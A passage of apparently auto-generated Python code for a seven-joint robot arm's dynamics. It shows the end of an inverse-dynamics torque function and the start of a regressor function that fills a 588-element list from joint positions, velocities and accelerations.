x131 = parms[74]*x125 + parms[76]*x118 + parms[77]*x120 + parms[78]*x121 - parms[79]*x123 - x124*x129 + x126*x130
x132 = parms[61]*x102 + parms[63]*x95 + parms[64]*x97 - parms[66]*x103 + parms[68]*x110 - x100*x111 + x101*x98 - x131
x133 = -x92
x134 = -x109*x92 - x85*x90
x135 = -x134
x136 = parms[74]*x126 + parms[76]*x124 + parms[77]*x128
x137 = parms[72]*x125 + parms[73]*x118 + parms[74]*x120 + parms[79]*x135 - parms[80]*x121 + x124*x136 - x128*x130
x138 = -x112
x139 = parms[73]*x125 + parms[75]*x118 + parms[76]*x120 - parms[78]*x135 + parms[80]*x123 - x126*x136 + x128*x129
x140 = parms[61]*x100 + parms[63]*x99 + parms[64]*x98
x141 = parms[60]*x102 + parms[61]*x95 + parms[62]*x97 + parms[67]*x103 + parms[68]*x135 + x111*x99 - x114*x139 + x137*x138 - x140*x98
x142 = parms[50]*x84 + parms[52]*x88 + parms[53]*x67 + parms[54]*x83 + parms[55]*x86 + x132*x133 + x141*x90 + x71*x75 + x74*x87
x143 = parms[37]*x61 + parms[39]*x63 + parms[40]*x58 - parms[42]*x66 + parms[44]*x57 + x142 + x39*x46 - x42*x59
x144 = parms[50]*x74 + parms[52]*x70 + parms[53]*x72
x145 = parms[62]*x102 + parms[64]*x95 + parms[65]*x97 + parms[66]*x134 + parms[67]*x122 + x100*x140 + x101*x127 + x114*x137 + x138*x139
x146 = parms[49]*x84 + parms[51]*x88 + parms[52]*x67 - parms[54]*x109 + parms[56]*x85 - x144*x74 - x145 + x72*x75
x147 = x72*x74
x148 = ((x72)*(x72))
x149 = ((x70)*(x70))
x150 = x70*x74
x151 = x100*x98
x152 = x100*x99
x153 = ((x98)*(x98))
x154 = ((x99)*(x99))
x155 = ((x126)*(x126))
x156 = ((x128)*(x128))
x157 = x124*x128
x158 = x124*x126
x159 = -parms[78]*(x120 + x158) - parms[79]*(-x155 - x156) - parms[80]*(-x125 + x157) - parms[81]*x121
x160 = x126*x128
x161 = ((x124)*(x124))
x162 = parms[78]*(-x156 - x161) + parms[79]*(-x120 + x158) + parms[80]*(x118 + x160) + parms[81]*x123
x163 = parms[66]*(-x153 - x154) + parms[67]*(x117 + x152) + parms[68]*(x151 + x95) + parms[69]*x110 + x114*x159 + x138*x162
x164 = x98*x99
x165 = ((x100)*(x100))
x166 = -parms[66]*(x152 + x97) - parms[67]*(-x153 - x165) - parms[68]*(x116 + x164) - parms[69]*x134 + parms[78]*(-x118 + x160) + parms[79]*(x125 + x157) + parms[80]*(-x155 - x161) + parms[81]*x135
x167 = parms[54]*(-x148 - x149) + parms[55]*(x150 + x94) + parms[56]*(x147 + x88) + parms[57]*x85 + x133*x163 + x166*x90
x168 = parms[37]*x42 + parms[39]*x45 + parms[40]*x39
x169 = parms[48]*x84 + parms[49]*x88 + parms[50]*x67 + parms[55]*x109 + parms[56]*x103 - x132*x90 + x133*x141 + x144*x70 - x72*x87
x170 = x70*x72
x171 = ((x74)*(x74))
x172 = parms[54]*(x150 + x67) + parms[55]*(-x148 - x171) + parms[56]*(x170 + x89) + parms[57]*x83 - parms[66]*(x119 + x151) - parms[67]*(x102 + x164) - parms[68]*(-x154 - x165) - parms[69]*x103 - x112*x159 - x114*x162
x173 = x172*x68
x174 = parms[36]*x61 + parms[37]*x63 + parms[38]*x58 + parms[43]*x66 - parms[44]*x108 + x146*x73 - 0.27747*x167*x69 - x168*x39 + x169*x68 - 0.27747*x173 + x45*x59
x175 = parms[24]*x31 + parms[25]*x37 + parms[26]*x36 + parms[31]*x35 + parms[32]*x30 + x107*x143 + x12*x4 - x13*x9 + x174*x41
x176 = -x1
x177 = parms[42]*(x58 + x80) + parms[43]*x106 + parms[44]*(-x61 + x76) + parms[45]*x108 + parms[54]*(x147 + x96) + parms[55]*(x170 + x84) + parms[56]*(-x149 - x171) + parms[57]*x109 + x163*x90 + x166*x92
x178 = x39*x42
x179 = ((x45)*(x45))
x180 = x167*x68
x181 = parms[42]*(-x104 - x179) + parms[43]*x81 + parms[44]*(x178 + x63) + parms[45]*x57 + x172*x73 + x180
x182 = parms[30]*x49 + parms[31]*(-x36 + x64) + parms[32]*(x37 + x54) + parms[33]*x51 + x107*x177 + x181*x41
x183 = x182*x2
x184 = parms[38]*x61 + parms[40]*x63 + parms[41]*x58 + parms[42]*x108 - parms[43]*x57 - x146*x68 + x168*x42 + x169*x73 + 0.27747*x172*x69 - 0.27747*x180 - x45*x46
x185 = x181*x40
x186 = x177*x41
x187 = parms[24]*x11 + parms[25]*x4 + parms[26]*x9
x188 = parms[25]*x31 + parms[27]*x37 + parms[28]*x36 - parms[30]*x35 + parms[32]*x51 - x11*x12 - x184 + 0.00502*x185 + 0.00502*x186 + x187*x9
x189 = ((x11)*(x11))
x190 = x4*x9
x191 = parms[42]*(x178 - x63) + parms[43]*x77 + parms[44]*(-x105 - x179) + parms[45]*x66 + x167*x73 - x173
x192 = parms[30]*x65 + parms[31]*(-x189 - x47) + parms[32]*(x190 + x62) + parms[33]*x29 - x191
x193 = x1*x192
x194 = dq[1]*parms[17] + parms[14]*x3 + parms[16]*x7
x195 = dq[1]*parms[16] + parms[13]*x3 + parms[15]*x7
x196 = dq[1]*parms[14] + parms[12]*x3 + parms[13]*x7
x197 = parms[26]*x31 + parms[28]*x37 + parms[29]*x36 + parms[30]*x29 - parms[31]*x51 + x11*x13 + x143*x41 + x174*x40 + x187*x38 + 0.00502*x191
#
tau_out[0] = ddq[0]*parms[5] + parms[6]*x17 + parms[7]*x32 + x0*(ddq[1]*parms[14] - dq[1]*x195 + parms[12]*x21 + parms[13]*x15 + parms[19]*x18 + parms[20]*x34 + x175*x176 - 0.27857*x183 + x188*x50 + 0.27857*x193 + x194*x7) + x6*(ddq[1]*parms[16] + dq[1]*x196 + parms[13]*x21 + parms[15]*x15 + parms[18]*x19 + parms[20]*x25 + x10*x194 + 0.03175*x183 - 0.03175*x193 - x197)
tau_out[1] = ddq[1]*parms[17] + parms[14]*x21 + parms[16]*x15 + parms[18]*x33 + parms[19]*x26 + 0.03175*parms[30]*x55 + 0.03175*parms[31]*(x190 + x31) + 0.03175*parms[32]*(-x189 - x48) + 0.03175*parms[33]*x35 - 0.27857*x1*x182 + x175*x2 + x176*x188 + 0.03175*x185 + 0.03175*x186 - 0.27857*x192*x2 + x195*x3 + x196*x8
tau_out[2] = x197
tau_out[3] = x184
tau_out[4] = x142
tau_out[5] = x145
tau_out[6] = x131
#
return tau_out
def regressor( q, dq, ddq ) :
#
regressor_out = [0]*588
#
x0 = 9.81*sin(q[0])
x1 = -9.81*cos(q[0])
x2 = -x1
x3 = sin(q[1])
x4 = -x3
x5 = dq[0]*x4
x6 = dq[1]*x5
x7 = cos(q[1])
x8 = ddq[0]*x7 + x6
x9 = dq[0]*x7
x10 = dq[1]*x9
x11 = -ddq[0]*x3 - x10
x12 = -x10
x13 = x6 + x8
x14 = x5*x9
x15 = ddq[1] + x14
x16 = ((x9)*(x9))
x17 = ((dq[1])*(dq[1]))
x18 = -x6
x19 = -x14
x20 = ((x5)*(x5))
x21 = -x0
x22 = -x21
x23 = x1*x4
x24 = x2*x7
x25 = -x24
x26 = sin(q[2])
x27 = -x26
x28 = cos(q[2])
x29 = dq[1]*x28 + x27*x9
x30 = -dq[1]*x26 - x28*x9
x31 = x29*x30
x32 = -x31
x33 = ddq[1]*x28 + dq[2]*x30 - x26*x8
x34 = dq[2] - x5
x35 = x29*x34
x36 = -ddq[1]*x26 - dq[2]*x29 - x28*x8
x37 = -x35
x38 = x36 + x37
x39 = x30*x34
x40 = x33 + x39
x41 = ((x30)*(x30))
x42 = ((x29)*(x29))
x43 = -x41 + x42
x44 = ((x34)*(x34))
x45 = -x42 + x44
x46 = -x11
x47 = ddq[2] + x46
x48 = x31 + x47
x49 = x26*x48
x50 = -x39
x51 = x33 + x50
x52 = x35 + x36
x53 = x32 + x47
x54 = x41 - x44
x55 = -x47
x56 = -x41 - x44
x57 = x28*x56
x58 = 0.03175*x15 - 0.27857*x16 - 0.27857*x17 + x25
x59 = -x58
x60 = -x28
x61 = 0.03175*x10 + 0.27857*x13 + x22 + 0.03175*x46
x62 = -x23
x63 = -0.27857*ddq[1] + 0.27857*x14 - 0.03175*x17 - 0.03175*x20 + x62
x64 = x26*x61 + x28*x63
x65 = -x64
x66 = x31 + x55
x67 = x28*x66
x68 = -x42 - x44
x69 = x26*x68
x70 = x26*x63 + x60*x61
x71 = -x70
x72 = x28*x52
x73 = -x33
x74 = x39 + x73
x75 = x26*x74
x76 = x26*x64
x77 = x28*x70
x78 = sin(q[3])
x79 = cos(q[3])
x80 = x29*x79 + x34*x78
x81 = dq[3] - x30
x82 = x80*x81
x83 = -x78
x84 = x34*x79
x85 = x29*x78
x86 = -dq[3]
x87 = x33*x79 + x47*x78 + x86*(-x84 + x85)
x88 = x79*x87 + x82*x83
x89 = x84 - x85
x90 = x80*x89
x91 = -x90
x92 = -x91
x93 = x78*x87 + x79*x82
x94 = x81*x89
x95 = x87 + x94
x96 = x47*x79 + x73*x78 + x80*x86
x97 = -x82
x98 = x96 + x97
x99 = x79*x98 + x83*x95
x100 = ((x80)*(x80))
x101 = ((x89)*(x89))
x102 = x100 - x101
x103 = -x102
x104 = x78*x98 + x79*x95
x105 = ((x81)*(x81))
x106 = -x100 + x105
x107 = -x36
x108 = ddq[3] + x107
x109 = x108 + x90
x110 = x106*x79 + x109*x78
x111 = x109*x79
x112 = x106*x83 + x111
x113 = -x94
x114 = x113 + x87
x115 = -x114
x116 = x113*x78 + x79*x96
x117 = -x96
x118 = x113*x79 + x117*x78
x119 = x108 + x91
x120 = x101 - x105
x121 = x119*x83 + x120*x79
x122 = x82 + x96
x123 = -x122
x124 = x119*x79 + x120*x78
x125 = x78*x94 + x79*x97
x126 = -x108
x127 = x79*x94 + x83*x97
x128 = x117 + x82
x129 = -x128
x130 = x129*x26
x131 = -x101 - x105
x132 = x109*x83 + x131*x79
x133 = x132*x28
x134 = x107 + x35
x135 = -0.00502*x134 + x58
x136 = -0.00502*x56 + x70
x137 = x135*x79 + x136*x83
x138 = -x137
x139 = x131*x78
x140 = 0.00502*x111 + x138 + 0.00502*x139
x141 = 0.00502*x48 + x65
x142 = -x141
x143 = x142*x83
x144 = 0.00502*x128 + x142*x79
x145 = -x100 - x105
x146 = x126 + x90
x147 = x145*x83 + x146*x79
x148 = x147*x28
x149 = -x95
x150 = x149*x26
x151 = x141*x78 + 0.00502*x95
x152 = x145*x79
x153 = x146*x78
x154 = x135*x78 + x136*x79
x155 = -x154
x156 = 0.00502*x152 + 0.00502*x153 - x155
x157 = x141*x79
x158 = -x100 - x101
x159 = x154*x79
x160 = x138*x78 + 0.00502*x158 + x159
x161 = -x87 + x94
x162 = x122*x79 + x161*x83
x163 = x162*x28
x164 = -x158
x165 = x164*x26
x166 = x122*x78 + x161*x79
x167 = 0.00502*x166
x168 = x138*x79 + x154*x83
x169 = x137*x83 + x159
x170 = x169*x28
x171 = x137*x79 + x154*x78
x172 = 0.00502*x171
x173 = x142*x26
x174 = 0.00502*x141
x175 = cos(q[4])
x176 = sin(q[4])
x177 = -x176
x178 = x175*x80 + x177*x81
x179 = dq[4] + x89
x180 = x178*x179
x181 = -x175*x81 - x176*x80
x182 = dq[4]*x181 + x126*x176 + x175*x87
x183 = -x175*x180 - x176*x182
x184 = -x183
x185 = x178*x181
x186 = -x185
x187 = x175*x182 + x177*x180
x188 = x186*x83 + x187*x79
x189 = x186*x79 + x187*x78
x190 = x179*x181
x191 = x182 + x190
x192 = -x180
x193 = -dq[4]*x178 - x108*x175 - x176*x87
x194 = x192 + x193
x195 = -x175*x191 - x176*x194
x196 = -x195
x197 = ((x181)*(x181))
x198 = ((x178)*(x178))
x199 = -x197 + x198
x200 = x175*x194 + x177*x191
x201 = x199*x83 + x200*x79
x202 = x199*x79 + x200*x78
x203 = ddq[4] + x96
x204 = x185 + x203
x205 = x176*x204
x206 = ((x179)*(x179))
x207 = -x198 + x206
x208 = -x175*x207 - x205
x209 = -x208
x210 = -x190
x211 = x182 + x210
x212 = x175*x204
x213 = x177*x207 + x212
x214 = x211*x83 + x213*x79
x215 = x211*x79 + x213*x78
x216 = -x175*x193 - x176*x210
x217 = -x216
x218 = x175*x210 + x177*x193
x219 = x185*x83 + x218*x79
x220 = x185*x79 + x218*x78
x221 = x186 + x203
x222 = x197 - x206
x223 = -x175*x221 - x176*x222
x224 = -x223
x225 = x180 + x193
x226 = x175*x222 + x177*x221
x227 = x225*x83 + x226*x79
x228 = x225*x79 + x226*x78
x229 = -x175*x192 - x176*x190
x230 = -x229
x231 = -x203
x232 = x175*x190 + x177*x192
x233 = x231*x78 + x232*x79
x234 = x203*x79 + x232*x78
x235 = x137 + 0.27747*x145
x236 = -x235
x237 = -x197 - x206
x238 = x176*x237
x239 = -x176*x236 - 0.27747*x212 - 0.27747*x238
x240 = x141 + 0.27747*x95
x241 = 0.27747*x146 + x154
x242 = -x175*x240 - x176*x241
x243 = -x242
x244 = x239*x79 + x243*x78
x245 = -x212 - x238
x246 = -x245
x247 = x246*x26
x248 = x175*x237
x249 = x177*x204 + x248
x250 = x249*x78
x251 = -x175
x252 = 0.27747*x205 + x236*x251 - 0.27747*x248
x253 = -x193
x254 = x180 + x253
x255 = x254*x79
x256 = 0.00502*x250 - x252 + 0.00502*x255
x257 = x249*x79 + x254*x83
x258 = x257*x28
x259 = x239*x78 + x242*x79 + 0.00502*x245
x260 = x185 + x231
x261 = x175*x260
x262 = -x198 - x206
x263 = x177*x262 + x261
x264 = x191*x83 + x263*x79
x265 = x264*x28
x266 = x263*x78
x267 = 0.27747*x176
x268 = x177*x235 - 0.27747*x261 + x262*x267
x269 = x191*x79
x270 = 0.00502*x266 - x268 + 0.00502*x269
x271 = x176*x260
x272 = x175*x262
x273 = x175*x235 - 0.27747*x271 - 0.27747*x272
x274 = x175*x241 + x177*x240
x275 = -x274
x276 = x273*x79 + x275*x83
x277 = -x271 - x272
x278 = -x277
x279 = x26*x278
x280 = x273*x78 + x275*x79 + 0.00502*x277
x281 = x176*x225
x282 = -x182
x283 = x190 + x282
x284 = x175*x283
x285 = x175*x243 + x177*x274 - 0.27747*x281 - 0.27747*x284
x286 = -x281 - x284
x287 = x285*x78 + 0.00502*x286
x288 = x175*x225
x289 = x177*x283 + x288
x290 = -x197 - x198
x291 = x289*x79 + x290*x83
x292 = x28*x291
x293 = -x286
x294 = x26*x293
x295 = x285*x79
x296 = x290*x79
x297 = x289*x78
x298 = x175*x275 + x177*x243 + x267*x283 - 0.27747*x288
x299 = 0.00502*x296 + 0.00502*x297 - x298
x300 = x175*x242 + x176*x274
x301 = -x300
x302 = -x301
x303 = x26*x302
x304 = x175*x274
x305 = x177*x242 + x304
x306 = x235*x83 + x305*x79
x307 = x28*x306
x308 = x305*x78
x309 = x242*x267 - 0.27747*x304
x310 = x235*x79
x311 = 0.00502*x308 - x309 + 0.00502*x310
x312 = -0.27747*x300
x313 = x312*x79
x314 = 0.00502*x301 + x312*x78
x315 = sin(q[5])
x316 = cos(q[5])
x317 = -x178*x316 - x179*x315
x318 = dq[5]*x317 + x203*x316 + x282*x315
x319 = x178*x315
x320 = x179*x316
x321 = -x319 + x320
x322 = dq[5] - x181
x323 = x321*x322
x324 = -x315*x318 - x316*x323
x325 = x317*x321
x326 = -x325
x327 = -x326
x328 = x175*x324 + x177*x327
x329 = -x315
x330 = x316*x318 + x323*x329
x331 = x328*x78 + x330*x79
x332 = x328*x79 + x330*x83
x333 = -x175*x327 - x176*x324
x334 = -x333
x335 = dq[5]*(x319 - x320) + x231*x315 + x282*x316
x336 = -x323
x337 = x335 + x336
x338 = x317*x322
x339 = x318 + x338
x340 = x316*x337 + x329*x339
x341 = -x315*x337 - x316*x339
x342 = ((x317)*(x317))
x343 = ((x321)*(x321))
x344 = -x342 + x343
x345 = -x344
x346 = x175*x341 + x177*x345
x347 = x340*x79 + x346*x78
x348 = x340*x83 + x346*x79
x349 = -x175*x345 - x176*x341
x350 = -x349
x351 = ((x322)*(x322))
x352 = -x343 + x351
x353 = ddq[5] + x253
x354 = x325 + x353
x355 = x316*x354
x356 = x329*x352 + x355
x357 = -x315*x354 - x316*x352
x358 = -x338
x359 = x318 + x358
x360 = -x359
x361 = x175*x357 + x177*x360
x362 = x356*x83 + x361*x79
x363 = -x175*x360 - x176*x357
x364 = -x363
x365 = x356*x79 + x361*x78
x366 = -x335
x367 = x315*x366 + x316*x358
x368 = -x315*x358 - x316*x335
x369 = x175*x368 + x177*x326
x370 = x367*x83 + x369*x79
x371 = -x175*x326 - x176*x368
x372 = -x371
x373 = x367*x79 + x369*x78
x374 = x342 - x351
x375 = x326 + x353
x376 = -x315*x374 - x316*x375
x377 = x323 + x335
x378 = -x377
x379 = x175*x376 + x177*x378
x380 = x316*x374 + x329*x375
x381 = x379*x78 + x380*x79
x382 = -x175*x378 - x176*x376
x383 = -x382
x384 = x379*x79 + x380*x83
x385 = -x315*x338 - x316*x336
x386 = -x353
x387 = x175*x385 + x177*x386
x388 = x316*x338 + x329*x336
x389 = x387*x78 + x388*x79
x390 = x387*x79 + x388*x83
x391 = -x175*x386 - x176*x385
x392 = -x391
x393 = -x323 - x366
x394 = -x235*x315 - x274*x316
x395 = -x394
x396 = -x243
x397 = -x316*x396
x398 = -x342 - x351
x399 = -x315*x398 - x355
x400 = x175*x399
x401 = x177*x397 + x251*x395 + x267*x393 - 0.27747*x400
x402 = x177*x393 + x400
x403 = x402*x78
x404 = x316*x398 + x329*x354
x405 = x404*x79
x406 = -x401 + 0.00502*x403 + 0.00502*x405
x407 = x175*x393
x408 = x176*x399
x409 = -x407 - x408
x410 = -x409
x411 = x26*x410
x412 = x175*x397 + x177*x395 - 0.27747*x407 - 0.27747*x408
x413 = x329*x396
x414 = x412*x79 + x413*x83
x415 = x402*x79 + x404*x83
x416 = x28*x415
x417 = 0.00502*x409 + x412*x78 + x413*x79
x418 = -x339
x419 = x243*x329
x420 = x235*x316 + x275*x315
x421 = -x420
x422 = -x421
x423 = -x343 - x351
x424 = x325 + x386
x425 = -x315*x424 - x316*x423
x426 = x175*x425
x427 = x177*x419 + x251*x422 + x267*x418 - 0.27747*x426
x428 = x177*x418 + x426
x429 = x428*x78
x430 = x316*x424 + x329*x423
x431 = x430*x79
x432 = -x427 + 0.00502*x429 + 0.00502*x431
x433 = x175*x418
x434 = x176*x425
x435 = -x433 - x434
x436 = -x435
x437 = x26*x436
x438 = x428*x79 + x430*x83
x439 = x28*x438
x440 = x175*x419 + x177*x422 - 0.27747*x433 - 0.27747*x434
x441 = x243*x316
x442 = x440*x79 + x441*x83
x443 = 0.00502*x435 + x440*x78 + x441*x79
x444 = x316*x395 + x329*x420
x445 = x315*x395 + x316*x420
x446 = -x445
x447 = x342 + x343
x448 = x175*x447
x449 = -x318
x450 = x338 + x449
x451 = -x315*x377 - x316*x450
x452 = x176*x451
x453 = x175*x446 - 0.27747*x448 - 0.27747*x452
x454 = -x448 - x452
x455 = x444*x79 + x453*x78 + 0.00502*x454
x456 = -x454
x457 = x26*x456
x458 = x175*x451
x459 = x177*x447 + x458
x460 = x316*x377 + x329*x450
x461 = x459*x79 + x460*x83
x462 = x28*x461
x463 = x459*x78
x464 = x460*x79
x465 = x177*x446 + x267*x447 - 0.27747*x458
x466 = 0.00502*x463 + 0.00502*x464 - x465
x467 = x444*x83 + x453*x79
x468 = -x315*x420 - x316*x394
x469 = x175*x396 + x176*x468
x470 = -x469
x471 = -0.27747*x469
x472 = 0.00502*x470 + x471*x78
x473 = -x470
x474 = x26*x473
x475 = x175*x468
x476 = x177*x396 + x475
x477 = x445*x83 + x476*x79
x478 = x28*x477
x479 = x267*x396 - 0.27747*x475
x480 = x445*x79
x481 = x476*x78
x482 = -x479 + 0.00502*x480 + 0.00502*x481
x483 = x471*x79
x484 = cos(q[6])
x485 = sin(q[6])
x486 = -x321*x484 - x322*x485
x487 = dq[6]*x486 + x353*x484 + x449*x485
x488 = -x485
x489 = x321*x485
x490 = x322*x484
x491 = -x489 + x490
x492 = dq[6] - x317
x493 = x491*x492
x494 = x484*x487 + x488*x493
x495 = -x494
x496 = -x484*x493 - x485*x487
x497 = x486*x491
x498 = -x497
x499 = -x498
x500 = -x315*x496 - x316*x499
x501 = x175*x500 + x177*x495
x502 = x316*x496 + x329*x499
x503 = x501*x78 + x502*x79
x504 = -x175*x495 - x176*x500
x505 = -x504
x506 = x501*x79 + x502*x83
x507 = ((x486)*(x486))
x508 = ((x491)*(x491))
x509 = -x507 + x508
x510 = -x509
x511 = x486*x492
x512 = x487 + x511
x513 = dq[6]*(x489 - x490) + x386*x485 + x449*x484
x514 = -x493
x515 = x513 + x514
x516 = -x484*x512 - x485*x515
x517 = -x315*x516 - x316*x510
x518 = x484*x515 + x488*x512
x519 = -x518
x520 = -x175*x519 - x176*x517
x521 = -x520
x522 = x316*x516 + x329*x510
x523 = x175*x517 + x177*x519
x524 = x522*x83 + x523*x79
x525 = x522*x79 + x523*x78
x526 = ((x492)*(x492))
x527 = -x508 + x526
x528 = ddq[6] + x366
x529 = x497 + x528
x530 = -x484*x527 - x485*x529
x531 = -x511
x532 = x487 + x531
x533 = -x532
x534 = -x315*x530 - x316*x533
x535 = x484*x529
x536 = x488*x527 + x535
x537 = -x536
x538 = -x175*x537 - x176*x534
x539 = -x538
x540 = x316*x530 + x329*x533
x541 = x175*x534 + x177*x537
x542 = x540*x83 + x541*x79
x543 = x540*x79 + x541*x78
x544 = -x484*x513 - x485*x531
x545 = -x315*x544 - x316*x498
x546 = -x513
x547 = x484*x531 + x485*x546
x548 = -x547
x549 = x175*x545 + x177*x548
x550 = x316*x544 + x329*x498
x551 = x549*x78 + x550*x79
x552 = -x175*x548 - x176*x545
x553 = -x552
x554 = x549*x79 + x550*x83
x555 = x493 + x513
x556 = -x555
x557 = x507 - x526
x558 = x498 + x528
x559 = -x484*x558 - x485*x557
x560 = -x315*x559 - x316*x556
x561 = x484*x557 + x488*x558
x562 = -x561
x563 = x175*x560 + x177*x562
x564 = x316*x559 + x329*x556
x565 = x563*x78 + x564*x79
x566 = -x175*x562 - x176*x560
x567 = -x566
x568 = x563*x79 + x564*x83
x569 = x484*x511 + x488*x514
x570 = -x569
x571 = -x528
x572 = -x484*x514 - x485*x511
x573 = -x315*x572 - x316*x571
x574 = x175*x573 + x177*x570
x575 = x316*x572 + x329*x571
x576 = x574*x78 + x575*x79
x577 = -x175*x570 - x176*x573
x578 = -x577
x579 = x574*x79 + x575*x83
x580 = -x395
x581 = -x484*x580
x582 = -x243*x485 - x420*x484
x583 = -x582
x584 = -x315*x581 - x316*x583
x585 = -x507 - x526
x586 = -x484*x585 - x488*x529
x587 = x175*x586
x588 = x488*x580
x589 = -x588
x590 = -x493 - x546
x591 = -x485*x585 - x535
x592 = -x315*x591 - x316*x590
x593 = x176*x592
x594 = x175*x584 + x177*x589 - 0.27747*x587 - 0.27747*x593
x595 = -x587 - x593
x596 = x316*x581 + x329*x583
x597 = x594*x78 + 0.00502*x595 + x596*x79
x598 = x316*x591 + x329*x590
x599 = x175*x592
x600 = x177*x586 + x599
x601 = x598*x83 + x600*x79
x602 = x28*x601
x603 = -x595
x604 = x26*x603
x605 = x598*x79
x606 = x177*x584 + x251*x589 + x267*x586 - 0.27747*x599
x607 = x600*x78
x608 = 0.00502*x605 - x606 + 0.00502*x607
x609 = x594*x79 + x596*x83
x610 = x395*x488
x611 = x243*x484 + x421*x485
x612 = -x611
x613 = -x612
x614 = -x315*x610 - x316*x613
x615 = -x508 - x526
x616 = x497 + x571
x617 = -x484*x616 - x488*x615
x618 = x175*x617
x619 = x395*x484
x620 = -x619
x621 = -x512
x622 = -x484*x615 - x485*x616
x623 = -x315*x622 - x316*x621
x624 = x176*x623
x625 = x175*x614 + x177*x620 - 0.27747*x618 - 0.27747*x624
x626 = -x618 - x624
x627 = x316*x610 + x329*x613
x628 = x625*x78 + 0.00502*x626 + x627*x79
x629 = x175*x623
x630 = x177*x617 + x629
x631 = x316*x622 + x329*x621
x632 = x630*x79 + x631*x83
x633 = x28*x632
x634 = -x626
x635 = x26*x634
x636 = x177*x614 + x251*x620 + x267*x617 - 0.27747*x629
x637 = x630*x78
x638 = x631*x79
x639 = -x636 + 0.00502*x637 + 0.00502*x638
x640 = x625*x79 + x627*x83
x641 = x507 + x508
x642 = -x487 + x511
x643 = -x484*x642 - x485*x555
x644 = -x315*x643 - x316*x641
x645 = x176*x644
x646 = -x484*x555 - x488*x642
x647 = x175*x646
x648 = -x645 - x647
x649 = -x648
x650 = x26*x649
x651 = x175*x644
x652 = x177*x646 + x651
x653 = x316*x643 + x329*x641
x654 = x652*x79 + x653*x83
x655 = x28*x654
x656 = x484*x583 + x488*x611
x657 = -x656
x658 = x484*x611
x659 = -x485*x583 - x658
x660 = x329*x659
x661 = x175*x660 + x177*x657 - 0.27747*x645 - 0.27747*x647
x662 = x316*x659
x663 = 0.00502*x648 + x661*x78 + x662*x79
x664 = x653*x79
x665 = x652*x78
x666 = x177*x660 + x251*x657 + x267*x646 - 0.27747*x651
x667 = 0.00502*x664 + 0.00502*x665 - x666
x668 = x661*x79 + x662*x83
x669 = -x488*x582 - x658
x670 = -x484*x582 - x485*x611
x671 = -x315*x670 - x316*x580
x672 = x175*x669 + x176*x671
x673 = -0.27747*x672
x674 = x673*x79
x675 = x175*x671
x676 = x267*x669 - 0.27747*x675
x677 = x177*x669 + x675
x678 = x677*x78
x679 = x316*x670 + x329*x580
x680 = x679*x79
x681 = -x676 + 0.00502*x678 + 0.00502*x680
x682 = -x672
x683 = -x682
x684 = x26*x683
x685 = x677*x79 + x679*x83
x686 = x28*x685
x687 = x673*x78 + 0.00502*x682
x688 = x28*x48
#
regressor_out[0] = 0
regressor_out[1] = 0
regressor_out[2] = 0
regressor_out[3] = 0
regressor_out[4] = 0
regressor_out[5] = ddq[0]
regressor_out[6] = x0
regressor_out[7] = x2
regressor_out[8] = 0
regressor_out[9] = 0
regressor_out[10] = dq[0]
regressor_out[11] = sign(dq[0])
regressor_out[12] = x10*x4 + x7*x8
regressor_out[13] = x13*x4 + x7*(x11 + x12)
regressor_out[14] = x15*x7 + x4*(-x16 + x17)
regressor_out[15] = x11*x4 + x18*x7
regressor_out[16] = x4*(ddq[1] + x19) + x7*(-x17 + x20)
regressor_out[17] = x12*x4 + x6*x7
regressor_out[18] = x22*x4
regressor_out[19] = x21*x7
regressor_out[20] = x23*x4 + x25*x7
regressor_out[21] = 0
regressor_out[22] = 0
regressor_out[23] = 0
regressor_out[24] = -x32*x4 + x7*(-x26*x33 - x28*x35)
regressor_out[25] = -x4*x43 + x7*(-x26*x38 - x28*x40)
regressor_out[26] = -x4*x51 + x7*(-x28*x45 - x49)
regressor_out[27] = x32*x4 + x7*(-x26*x50 - x28*x36)
regressor_out[28] = -x4*x52 + x7*(-x26*x54 - x28*x53)
regressor_out[29] = x4*x55 + x7*(-x26*x39 - x28*x37)
regressor_out[30] = x4*(-0.03175*x49 + 0.03175*x57 + x65) + x7*(0.27857*x49 - 0.27857*x57 + x59*x60)
regressor_out[31] = x4*(0.03175*x67 - 0.03175*x69 - x71) + x7*(x27*x58 - 0.27857*x67 + 0.27857*x69)
regressor_out[32] = x4*(0.03175*x72 - 0.03175*x75) + x7*(x27*x65 + x60*x70 - 0.27857*x72 + 0.27857*x75)
regressor_out[33] = x4*(-0.03175*x76 + 0.03175*x77) + x7*(0.27857*x76 - 0.27857*x77)
regressor_out[34] = 0
regressor_out[35] = 0
regressor_out[36] = -x4*x93 + x7*(-x26*x88 - x28*x92)
regressor_out[37] = -x104*x4 + x7*(-x103*x28 - x26*x99)
regressor_out[38] = -x110*x4 + x7*(-x112*x26 - x115*x28)
regressor_out[39] = -x116*x4 + x7*(-x118*x26 - x28*x91)
regressor_out[40] = -x124*x4 + x7*(-x121*x26 - x123*x28)
regressor_out[41] = -x125*x4 + x7*(-x126*x28 - x127*x26)
regressor_out[42] = x4*(-0.03175*x130 + 0.03175*x133 - x144) + x7*(0.27857*x130 - 0.27857*x133 + x140*x60 + x143*x27)
regressor_out[43] = x4*(0.03175*x148 - 0.03175*x150 - x151) + x7*(-0.27857*x148 + 0.27857*x150 + x156*x60 + x157*x27)
regressor_out[44] = x4*(-x160 + 0.03175*x163 - 0.03175*x165) + x7*(-0.27857*x163 + 0.27857*x165 + x167*x60 + x168*x27)
regressor_out[45] = x4*(0.03175*x170 - 0.03175*x173 - x174) + x7*(-0.27857*x170 + x172*x60 + 0.27857*x173)
regressor_out[46] = 0
regressor_out[47] = 0
regressor_out[48] = -x189*x4 + x7*(-x184*x28 - x188*x26)
regressor_out[49] = -x202*x4 + x7*(-x196*x28 - x201*x26)
regressor_out[50] = -x215*x4 + x7*(-x209*x28 - x214*x26)
regressor_out[51] = -x220*x4 + x7*(-x217*x28 - x219*x26)
regressor_out[52] = -x228*x4 + x7*(-x224*x28 - x227*x26)
regressor_out[53] = -x234*x4 + x7*(-x230*x28 - x233*x26)
regressor_out[54] = x4*(-0.03175*x247 + 0.03175*x258 - x259) + x7*(x244*x27 + 0.27857*x247 + x256*x60 - 0.27857*x258)
regressor_out[55] = x4*(0.03175*x265 - 0.03175*x279 - x280) + x7*(-0.27857*x265 + x27*x276 + x270*x60 + 0.27857*x279)
regressor_out[56] = x4*(-x287 + 0.03175*x292 - 0.03175*x294) + x7*(x27*x295 - 0.27857*x292 + 0.27857*x294 + x299*x60)
regressor_out[57] = x4*(-0.03175*x303 + 0.03175*x307 - x314) + x7*(x27*x313 + 0.27857*x303 - 0.27857*x307 + x311*x60)
regressor_out[58] = 0
regressor_out[59] = 0
